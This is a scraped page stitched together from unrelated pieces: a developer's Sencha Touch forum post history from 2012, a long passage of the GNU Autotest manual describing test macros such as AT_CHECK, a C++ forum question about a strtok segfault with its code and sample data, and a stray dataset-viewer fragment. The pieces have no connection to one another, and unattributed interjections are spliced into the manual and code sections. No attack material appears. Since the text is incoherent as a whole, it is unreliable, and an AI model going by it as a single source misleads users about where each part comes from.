Actually my Android device is broken and I'm waiting to have it back. I have no idea about the problem. Can you try it on Android 3.0?
You can also try to disable component filtering and,...
- 15 Feb 2012 3:09 PM
I cannot solve this problem... I have seen that the problem is that the constructor method cannot call the setter and getter creation. Is this normal for all components or for this one only?
Thanks...
- 15 Feb 2012 3:03 PM
The night is long and one hour less of sleep is a good investment if it gives me the opportunity to solve the B3 issue with my component... :)
The problem was not in CSS, I think, because I don't use...
- 15 Feb 2012 12:55 PM
Thanks for your post and again for your help in the past also.
Sorry, but I have no time until next week to work on this issue. I'm not using beta 3 at the moment, but next week I will look at it all.
- 12 Feb 2012 11:38 AM
I'm trying to develop a component to display a store dynamically: because my store is not always the same, I cannot use a static grid structure...
I really need help, please... I'm working on this...
- 11 Feb 2012 6:11 AM
I'm trying to define the "config" section in the constructor method of my extended 'MyRecordItem' class.
But if I set the "config" block in the constructor method using "Ext.apply", the ComponentView doesn't...
- 10 Feb 2012 4:03 AM
Thanks for your answer.
I will try with the 'after list refreshed' option.
- 10 Feb 2012 2:46 AM
Hi Mitchell,
as you know, my ext.ux.gp.grid component inherits from your very useful component. Now I'd like to add a button inside a column, but your component uses XTemplate and the underlying dataview is...
- 9 Feb 2012 11:10 PM
Using 'Ext.data.JsonP' it's all ok.
thanks
- 9 Feb 2012 12:33 PM
Thanks for your help about how I can optimize my code!
About ActionSheet, I think it is not the same, because it is possible to show my menu also as a button menu using showBy...
Thanks again
- 9 Feb 2012 7:13 AM
In my MVC app I'm using the paging feature and I'm listening for the 'itemtaphold' event from a controller.
'gpm-view-customers [xtype=touchgridpanel]' : {
itemtaphold :...
- 9 Feb 2012 4:19 AM
I have changed the component namespace in the GitHub repo from Ext.gp.Grid to Ext.ux.gp.Grid to respect the usual namespace rules.
- 9 Feb 2012 4:16 AM
I have published a new component on GitHub. It can show a menu sized to its item count.
I hope it is useful.
GitHub link:
- 9 Feb 2012 1:06 AM
Oops.... Syntax Error!!!!
Thanks
- 8 Feb 2012 11:59 PM
Thread: [PRx] to [BETA1] src folder, by tino7_03
Before BETA1 I copied only the sencha-touch-all-debug.js file and the resources folder into my project. Now I must copy the whole src folder as well.
If I don't copy it I receive this error (for example):...
Multiple test groups can be categorized by a call to AT_BANNER.
All of the public Autotest macros have all-uppercase names in the namespace ‘^AT_’ to prevent them from accidentally conflicting with other text; Autoconf also reserves the namespace ‘^_AT_’ for internal macros. All shell variables used in the testsuite for internal purposes have mostly-lowercase names starting with ‘at_’. Autotest also uses here-document delimiters in the namespace ‘^_AT[A-Z]’, and makes use of the file system namespace ‘^at-’.
Since Autoconf is built on top of M4sugar (see Programming in M4sugar) and M4sh (see Programming in M4sh), you must also be aware of those namespaces (‘^_?\(m4\|AS\)_’). In general, you should not use the namespace of a package that does not own the macro or shell code you are writing.
Initialize Autotest. Giving a name to the test suite is encouraged if your package includes several test suites. Before this macro is called, AT_PACKAGE_STRING and AT_PACKAGE_BUGREPORT must be defined, which are used to display information about the testsuite to the user. Typically, these macros are provided by a file package.m4 built by make (see Making testsuite Scripts), in order to inherit the package name, version, and bug reporting address from configure.ac.
State that, in addition to the Free Software Foundation's copyright on the Autotest macros, parts of your test suite are covered by copyright-notice.
The copyright-notice shows up in both the head of testsuite and in ‘testsuite --version’.
Accept options to the testsuite. If the user passes --option, the corresponding variable will be set to ‘:’. If the user does not pass the option, or passes --no-option, then the variable will be set to ‘false’.
action-if-given is run each time the option is encountered; here, the variable at_optarg will be set to ‘:’ or ‘false’ as appropriate.
Accept options with arguments of the form --option=arg or --option arg to the testsuite. If the user passes the option, the corresponding variable will be set to ‘arg’.
action-if-given is run each time the option is encountered; here, the variable at_optarg will be set to ‘arg’.
Enable colored test results by default when the output is connected to a terminal.
AT_BANNER(test-category-name) identifies the start of a category of related test groups. When the resulting testsuite is invoked with more than one test group to run, its output will include a banner containing test-category-name prior to any tests run from that category. The banner should be no more than about 40 or 50 characters. A blank banner will not print, effectively ending a category and letting subsequent test groups behave as though they are uncategorized when run in isolation.
This macro starts a group of related tests, all to be executed in the same subshell. It accepts a single argument, which holds a few words (no more than about 30 or 40 characters) quickly describing the purpose of the test group being started. test-group-name must not expand to unbalanced quotes, although quadrigraphs can be used.
Associate the space-separated list of keywords to the enclosing test group. This makes it possible to run “slices” of the test suite. For instance, if some of your test groups exercise some ‘foo’ feature, then using ‘AT_KEYWORDS(foo)’ lets you run ‘./testsuite -k foo’ to run exclusively these test groups. The test-group-name of each test group is automatically recorded as a keyword as well.
Make the test group fail and skip the rest of its execution, if shell-condition is true. shell-condition is a shell expression such as a test command. Tests before AT_FAIL_IF will be executed and may still cause the test group to be skipped. You can instantiate this macro many times from within the same test group.
You should use this macro only for very simple failure conditions. If the shell-condition could emit any kind of output you should instead use AT_CHECK like
AT_CHECK([if shell-condition; then exit 99; fi])
so that such output is properly recorded in the testsuite.log file.
Determine whether the test should be skipped because it requires features that are unsupported on the machine under test. shell-condition is a shell expression such as a test command. Tests before AT_SKIP_IF will be executed and may still cause the test group to fail. You can instantiate this macro many times from within the same test group.
You should use this macro only for very simple skip conditions. If the shell-condition could emit any kind of output you should instead use AT_CHECK like
AT_CHECK([if shell-condition; then exit 77; fi])
so that such output is properly recorded in the testsuite.log file.
AT_DATA(file, contents) initializes an input data file with the given contents, which must end with an end of line. file must be a single shell word that expands into a single file name.
Execute a test by performing given shell commands. commands is output as-is, so shell expansions are honored. These commands should normally exit with the specified status, while producing expected stdout and stderr contents. If commands exit with unexpected status 77, then the rest of the test group is skipped. If commands exit with unexpected status 99, then the test group is immediately failed. Otherwise, if this test fails, run shell commands run-if-fail or, if this test passes, run shell commands run-if-pass.
This macro must be invoked in between AT_SETUP and AT_CLEANUP.
If status is the literal ‘ignore’, then the corresponding exit status is not checked, except for the special cases of 77 (skip) and 99 (hard failure). The existence of hard failures allows one to mark a test as an expected failure with AT_XFAIL_IF because a feature has not yet been implemented, but to still distinguish between gracefully handling the missing feature and dumping core. A hard failure also inhibits post-test actions in run-if-fail.
If the value of the stdout or stderr parameter is one of the literals in the following table, then the test treats the output according to the rules of that literal. Otherwise, the value of the parameter is treated as text that must exactly match the output given by commands on standard output and standard error (including an empty parameter for no output); any differences are captured in the testsuite log and the test is failed (unless an unexpected exit status of 77 skipped the test instead). The difference between AT_CHECK and AT_CHECK_UNQUOTED is that only the latter performs shell variable expansion (‘$’), command substitution (‘`’), and backslash escaping (‘\’) on comparison text given in the stdout and stderr arguments; if the text includes a trailing newline, this would be the same as if it were specified via an unquoted here-document. (However, there is no difference in the interpretation of commands.)
- ‘ignore’
- The content of the output is ignored, but still captured in the test group log (if the testsuite is run with option -v, the test group log is displayed as the test is run; if the test group later fails, the test group log is also copied into the overall testsuite log). This action is valid for both stdout and stderr.
- ‘ignore-nolog’
- The content of the output is ignored, and nothing is captured in the log files. If commands are likely to produce binary output (including long lines) or large amounts of output, then logging the output can make it harder to locate details related to subsequent tests within the group, and could potentially corrupt terminal display of a user running testsuite -v.
- ‘stdout’
- For the stdout parameter, capture the content of standard output to both the file stdout and the test group log. Subsequent commands in the test group can then post-process the file. This action is often used when it is desired to use grep to look for a substring in the output, or when the output must be post-processed to normalize error messages into a common form.
- ‘stderr’
- Like ‘stdout’, except that it only works for the stderr parameter, and the standard error capture file will be named stderr.
- ‘stdout-nolog’
- ‘stderr-nolog’
- Like ‘stdout’ or ‘stderr’, except that the captured output is not duplicated into the test group log. This action is particularly useful for an intermediate check that produces large amounts of data, which will be followed by another check that filters down to the relevant data, as it makes it easier to locate details in the log.
- ‘expout’
- For the stdout parameter, compare standard output contents with the previously created file expout, and list any differences in the testsuite log.
- ‘experr’
- Like ‘expout’, except that it only works for the stderr parameter, and the standard error contents are compared with experr.
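As a quick illustration (this example is ours, not the manual's), a complete test group combining these macros might read:

AT_SETUP([simple echo])
AT_KEYWORDS([demo])
AT_CHECK([echo hello], [0], [hello
])
AT_CLEANUP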
Initialize and execute an Erlang module named module that performs tests following the test-spec EUnit test specification. test-spec must be a valid EUnit test specification, as defined in the EUnit Reference Manual. erlflags are optional command-line options passed to the Erlang interpreter to execute the test Erlang module. Typically, erlflags defines at least the paths to directories containing the compiled Erlang modules under test, as ‘-pa path1 path2 ...’.
For example, the unit tests associated with Erlang module ‘testme’, whose compiled code is in subdirectory src, can be performed with:
AT_CHECK_EUNIT([testme_testsuite], [{module, testme}], [-pa "${abs_top_builddir}/src"])
This macro must be invoked in between AT_SETUP and AT_CLEANUP.
Variables ERL, ERLC, and (optionally) ERLCFLAGS must be defined as the path of the Erlang interpreter, the path of the Erlang compiler, and the command-line flags to pass to the compiler, respectively. Those variables should be configured in configure.ac using the AC_ERLANG_PATH_ERL and AC_ERLANG_PATH_ERLC macros, and the configured values of those variables are automatically defined in the testsuite. If ERL or ERLC is not defined, the test group is skipped.
If the EUnit library cannot be found, i.e. if module eunit cannot be loaded, the test group is skipped. Otherwise, if test-spec is an invalid EUnit test specification, the test group fails. Otherwise, if the EUnit test passes, shell commands run-if-pass are executed or, if the EUnit test fails, shell commands run-if-fail are executed and the test group fails.
Only the generated test Erlang module is automatically compiled and executed. If test-spec involves testing other Erlang modules, e.g. module ‘testme’ in the example above, those modules must be already compiled.
If the testsuite is run in verbose mode, with option --verbose, EUnit is also run in verbose mode to output more details about individual unit tests.
Hey, I've written a piece of code which reads from a file called test.txt. All it does is use strtok to separate the data from the spaces, because there are a lot of them, and then print the fields out. This worked fine when I did a test for just one line, but when I put this code in a while(!ins.eof()) loop, it reports a seg fault. Here is my code:
#include <iostream>
#include <fstream>
#include <cstring>   // strtok (missing in the original post)
#include <cstdlib>   // exit

using namespace std;

int main()
{
    ifstream ins;
    ins.open("test.txt", ios::in);
    char info[500];
    if (ins.good())
    {
        ins.getline(info, 500); // first line are just titles
        while (!ins.eof())
        {
            int found = 0;
            ins.getline(info, 500);
            cout << info << endl;

            char *name = NULL;
            name = strtok(info, " ");   // read in name

            char *dates = NULL;
            dates = strtok(0, " ");     // read in dates

            char *dates2 = NULL;
            // if the first element of dates is 0, 1, 2, don't read in dates2
            if (dates[0] == '0' || dates[0] == '1' || dates[0] == '2')
            {
                found = 0;
            }
            else
            {
                // else read in 1 extra token (dates2)
                found = 1;
                dates2 = strtok(0, " ");
            }

            char *sold = NULL;
            sold = strtok(0, " ");

            char *minutes = NULL;
            minutes = strtok(0, " :");

            char *seconds = NULL;
            seconds = strtok(0, " ");

            cout << "name: " << name << endl;
            if (found == 1)
            {
                cout << "TRUEdate: " << dates << " " << dates2 << endl;
            }
            else if (found == 0)
            {
                cout << "FALSEdate: " << dates << endl;
            }
            cout << "sold: " << sold << endl;
            cout << "minutes: " << minutes << endl;
            cout << "seconds: " << seconds << endl;
            found = 0;
        }
        exit(1);
    }
    return 0;
}
For some reason it doesn't like me having this piece of code in there:

if (dates[0] == '0' || dates[0] == '1' || dates[0] == '2')
{
    found = 0;
}
else
{
    found = 1;
    dates2 = strtok(0, " ");
}

But the point of this is to read in the day from the date section if the date isn't in the 24:60:60 time format.
test.txt contains
NAME    DATE        SOLD    TIME
Sign    23:44:10    ?       0:00
Maria   Jul 11      ?       2:11
Umama   Feb 11      ?       0:00
Xtr     11:23:30    ?       103:03
Fit     Sep 17      ?       0:00
Ser     Dec 21      22231   0:00
Rim     08:28:20    13322   0:00
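For what it's worth, the crash is consistent with a classic pattern: while(!ins.eof()) reads one extra (often empty) line after the last record, strtok then returns NULL for dates, and dates[0] dereferences a null pointer. A guarded loop along these lines (a sketch, not the original poster's code) avoids it:

#include <cstring>   // strtok
#include <fstream>
#include <iostream>

using namespace std;

int main()
{
    ifstream ins("test.txt");
    char info[500];
    ins.getline(info, 500);            // skip the title line
    while (ins.getline(info, 500))     // loop on the read itself, not on eof()
    {
        char *name  = strtok(info, " ");
        char *dates = strtok(0, " ");
        if (name == NULL || dates == NULL)
            continue;                  // blank or malformed line: skip it
        cout << "name: " << name << ", date field: " << dates << endl;
        // ... tokenize the remaining fields, checking each strtok result
        // for NULL before dereferencing ...
    }
    return 0;
}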
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.